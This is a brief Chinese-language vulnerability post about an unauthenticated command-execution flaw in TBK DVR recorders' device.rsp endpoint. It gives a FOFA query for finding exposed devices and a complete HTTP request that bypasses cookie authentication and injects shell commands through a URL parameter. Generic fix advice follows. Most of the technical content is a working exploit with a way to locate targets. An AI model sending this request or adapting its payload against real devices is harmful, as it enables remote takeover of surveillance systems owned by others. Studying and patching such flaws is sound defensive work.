TBKDVR硬盘录像机device.rsp命令执行漏洞

免责声明：本号提供的网络安全信息仅供参考，不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权，请及时与我联系，我将尽快处理并删除相关内容。

漏洞描述

TBK DVR硬盘录像机 device.rsp 接口处存在命令执行漏洞，未经身份验证的远程攻击者可以利用此漏洞绕过cookie认证执行任意系统指令，写入后门文件，获取录像机shell权限。

漏洞再现

fofa："Location: /login.rsp"

GET /device.rsp？opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=uname%20-a;pwd;ls  HTTP/1.1 

Host: ip

Cookie: uid=1

 修复建议

1、请联系厂商进行修复。 2、如非必要，禁止公网访问该系统。 3、设置白名单访问。